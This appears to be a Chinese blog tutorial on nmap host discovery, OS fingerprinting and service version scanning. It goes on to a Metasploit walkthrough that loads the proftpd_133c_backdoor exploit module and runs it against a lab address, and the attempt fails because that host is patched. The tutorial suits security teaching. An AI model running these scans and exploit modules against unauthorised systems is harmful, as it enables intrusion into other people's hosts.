nmap扫描教程02

Network Sweeping

ping sweep
为了处理大量主机,或者节省网络流量,我们可以尝试使用网络扫描技术弹出目标,在这种技术中,我们从广泛扫描开始,然后对感兴趣的主机使用更具体的扫描

ping 扫描(扫一下同一个网段还行,感觉跨网段就很拉跨)
nmap -sn 192.168.99.0/24
只做主机发现,不做端口扫描
主机发现主要用到的技术有:
1.icmp request
2.433–TCP SYN
3.80–TCP ACK

nmap扫描教程02_第1张图片

同网段发送arp请求,不同网段发送433请求TCP

nmap扫描教程02_第2张图片

nmap -sn 172.30.1.0/24 -oG scan_oG.txt
-oG 对扫描的结果进行归类保存

nmap扫描教程02_第3张图片

指纹识别

nmap -O 172.30.1.128
-O :扫描判断系统指纹,但是不一定精准,需要配合其他工具判断

nmap扫描教程02_第4张图片

Banner和服务识别

Banner 中一般包含了软件的名称(服务名称)和软件的版本(服务版本),在图下可以看出当前msf的版本是v6.2.26,当然这个banner是可以被修改了,通过修改banner的信息来误导攻击者进行错误的攻击。

nmap扫描教程02_第5张图片

nmap -sV 172.30.1.128
-V :通过协议扫描开启端口服务的信息
通过扫描服务的版本去谷歌搜索当前版本服务有什么可以利用的漏洞,漏洞如果没有修复就可以直接利用

nmap扫描教程02_第6张图片

exploit 漏洞利用的意思

nmap扫描教程02_第7张图片

然后过msf 实现漏洞利用

nmap扫描教程02_第8张图片

msfdb run

nmap扫描教程02_第9张图片

search proftpd
search 搜索版本名称找到对应的版本编号

nmap扫描教程02_第10张图片

use 4
使用对应的模块序号
use exploit/unix/ftp/proftpd_133c_backdoor
或者使用对应的地址信息启用
options 查看配置详情

nmap扫描教程02_第11张图片

set rhosts 172.30.1.128
设置目标主机地址为 172.30.1.128
options

nmap扫描教程02_第12张图片

exploit
exploit 执行
发现这个漏洞是修复了的无法直接利用

在这里插入图片描述

你可能感兴趣的:(网络)